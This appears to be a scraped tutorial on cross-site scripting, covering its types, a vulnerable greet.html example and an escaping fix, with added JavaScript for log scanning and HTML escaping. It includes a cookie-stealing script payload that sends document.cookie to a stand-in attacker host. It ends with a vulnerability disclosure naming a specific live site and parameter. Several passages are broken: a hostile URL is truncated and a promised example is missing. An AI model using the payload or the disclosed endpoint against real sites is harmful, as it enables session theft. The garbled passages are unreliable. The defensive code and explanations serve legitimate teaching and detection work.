Cross-Site Scripting (XSS).
The injected code is executed in the security context (or security zone) of the vulnerable server. With those privileges, the code can read, modify or transfer sensitive data accessible from the browser. The attacked user's account can be compromised (cookie theft), the browser can be redirected to another server, or the server's content can be spoofed. In a carefully crafted attack the attacker may use the victim's browser to browse the site on behalf of the attacked user. The attacker can pass the code in the URL, in HTTP request headers (Cookie, User-Agent, Referer), in form field values, etc.
There are three types of cross-site scripting attacks: non-persistent (reflected), persistent (stored), and DOM-based. The main difference between persistent and non-persistent is that in the reflected variant the code travels to the server and back to the client within a single HTTP request, while in the stored variant the two happen in different requests.
Performing a non-persistent attack requires the user to follow a link generated by the attacker (the link can be delivered by email, ICQ, etc.). While the site is loading, the code embedded in the URL or request headers is passed back to the client and executed in the user's browser.
A stored vulnerability occurs when the code is transmitted to a server and stored there for some period of time. The most popular targets in this case are forums, webmail and chat rooms. The user does not have to click a link to be attacked; visiting the vulnerable site is enough.
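The text notes that the code arrives in the URL or in request headers and is reflected back to the client. From the defender's side, that means a reflected attempt leaves a trace in the web server's access log. The following is an added example, not code from the original text: it parses Combined Log Format lines (constructed samples, not real traffic), percent-decodes the request target, Referer and User-Agent fields, and reports which field carried a script tag. The field names, the `fullyDecode` bound of three rounds and the sample addresses are assumptions of this example.

```javascript
// Added example, not part of the original text: scan web-server access-log
// lines for the script-in-URL and script-in-header injection the text
// describes. Every log line below is a constructed sample, not real traffic.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /greet.html?name=David HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /greet.html?name=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
  '203.0.113.8 - - [10/Oct/2023:13:55:44 +0000] "GET /index.html HTTP/1.1" 200 900 "https://other.example/?q=%3Cscript%3E" "Mozilla/5.0"',
  '203.0.113.11 - - [10/Oct/2023:13:55:50 +0000] "GET /greet.html?name=%3Cb%3EDavid%3C%2Fb%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  'this line is not in Combined Log Format and is skipped',
];

// Combined Log Format: ip ident user [time] "method target protocol" status size "referer" "user-agent"
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

// Returns the parsed fields of one line, or null when the line does not match.
function parseLogLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4], status: m[5], referer: m[6], userAgent: m[7] };
}

// Percent-decode repeatedly (bounded) so that double-encoded input such as
// %253Cscript%253E is seen as <script>; malformed sequences are left as-is.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let round = 0; round < maxRounds; round++) {
    let next;
    try {
      next = decodeURIComponent(current.replace(/\+/g, ' '));
    } catch (err) {
      return current;
    }
    if (next === current) return current;
    current = next;
  }
  return current;
}

// Opening or closing script tag, tolerating whitespace after "<" and "/".
const SCRIPT_TAG_RE = /<\s*\/?\s*script\b/i;

// Names of the request fields in which a script tag appears after decoding.
function findScriptInjection(entry) {
  const fields = { target: entry.target, referer: entry.referer, userAgent: entry.userAgent };
  return Object.keys(fields).filter((name) => SCRIPT_TAG_RE.test(fullyDecode(fields[name])));
}

// One alert per matching line: who sent it, when, what was requested, which fields hit.
function scanLog(lines) {
  const alerts = [];
  for (const line of lines) {
    const entry = parseLogLine(line);
    if (!entry) continue;
    const fields = findScriptInjection(entry);
    if (fields.length > 0) alerts.push({ ip: entry.ip, time: entry.time, target: entry.target, fields });
  }
  return alerts;
}

console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```

Run against the samples, the scan flags the second line (script tag in the query string) and the third (script tag in the Referer header), and leaves the harmless `<b>David</b>` request alone, which is the distinction a triage rule needs: markup in input is common, a script tag is not.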
<SCRIPT>document.location='https://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</SCRIPT>
can be used to hide the script code
<script>
var name = decodeURIComponent(window.location.search.substring(6)) || "";
document.write("Привет " + name);
</script>
The second line of the script calls the window.location.search.substring method, which takes the query part of the URL (everything from the ? on) and drops its first six characters, "?name=". Then, using the document.write() method, the dynamically generated content is added to the document. This script assumes that the web page will be accessed with a URL like this:
https://www.example.com/greet.html?name=Давид
In this case the text “Hi David” will be displayed. But what happens if the page is requested using the following URL:
https://www.example.com/greet.html?na)
With this URL, the script dynamically generates another script (the encoded characters in the URL are angle brackets)! In this case the inserted script simply displays a dialog box, which poses no threat. But imagine this case:
Cross-site scripting is so called because more than one site is involved in the attack. Site B (or even site C) includes a specially constructed link (similar to the one just shown) to site A, and that link makes site A include a script from site B. The evil.js script is hosted on the attacker's site B, but now it ends up embedded in site A and can do whatever it wants with the content of site A. It can erase the page or cause other disruptions to the site (such as denial of service, as discussed in the next section). This can have a negative impact on the visitors to site A. More dangerously, such a malicious script could read the contents of cookies stored for site A (possibly containing account numbers or other personal information) and send that data back to site B. The embedded script could even track keystrokes and send that data back to site B.
A universal way to prevent XSS attacks is to remove HTML tags from all data of questionable origin before using it to dynamically create document content. To fix this problem in the greet.html file shown earlier, add the following line to the script; it replaces the angle brackets that delimit the script tag with their HTML entities:
name = name.replace(/</g, "&lt;").replace(/>/g, "&gt;");
Cross-site scripting is a vulnerability deeply rooted in the architecture of the World Wide Web. The depth of this vulnerability needs to be understood.
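The following is an added example, not code from the original page, covering both the greet.html input handling described above and the angle-bracket fix just shown. It reproduces the `substring(6)` logic as plain functions that run outside a browser (Node's global `URL` class stands in for `window.location`), applies the page's two replacements, and adds a fuller `escapeHtml` for the case the page's fix does not cover: a value written inside a quoted attribute, where a quote character rather than an angle bracket ends the attacker-controlled region. The function names, the `render` stand-in for document.write and the sample URLs are assumptions of this example.

```javascript
// Added example, not code from the original page: the greet.html input
// handling and the angle-bracket fix as functions that run outside a browser
// (Node's global URL class is used instead of window.location). The URLs are
// constructed samples.
const BENIGN_URL = 'https://www.example.com/greet.html?name=David';
const HOSTILE_URL = 'https://www.example.com/greet.html?name=%3Cscript%3Ealert(1)%3C/script%3E';

// What the page's script does: take the query part of the URL (from the "?"
// on), drop the six characters "?name=", and percent-decode the rest.
function readNameLikeGreetHtml(href) {
  const search = new URL(href).search; // same value as window.location.search
  return decodeURIComponent(search.substring(6)) || '';
}

// The fix shown on the page: neutralise the angle brackets that delimit tags.
function escapeAngleBrackets(name) {
  return name.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// A fuller escape for text written into HTML. The two replacements above
// stop <script> in text content, but a value placed inside a quoted
// attribute is ended by a quote character, so & " ' are escaped as well
// (& first, so the entities produced by later steps are not re-escaped).
function escapeHtml(text) {
  return text
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Stand-in for document.write("Hi " + name): builds the markup and reports
// whether it still contains a live <script> tag.
function render(href, escaper) {
  const html = 'Hi ' + escaper(readNameLikeGreetHtml(href));
  return { html, containsScriptTag: /<\s*script\b/i.test(html) };
}

const identity = (s) => s; // no escaping at all, as in the original greet.html

console.log(render(BENIGN_URL, identity));             // { html: 'Hi David', containsScriptTag: false }
console.log(render(HOSTILE_URL, identity));            // containsScriptTag: true
console.log(render(HOSTILE_URL, escapeAngleBrackets)); // containsScriptTag: false
console.log(render(HOSTILE_URL, escapeHtml));          // containsScriptTag: false
```

In real browser code the simplest equivalent of the escaped path is to avoid document.write entirely and assign the decoded name to an element's textContent, which the browser never parses as markup; escaping remains necessary wherever the value is concatenated into HTML source.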
Vulnerable site: https://dumps.pw
Vulnerable link: https://dumps.pw/check.php
PoC: https://i.imgur.com/3DJQMAY.jpg https://i.imgur.com/xKMtZh6.jpg
tests in the Mozilla Firefox browser https://dumps.pw/check.php?check=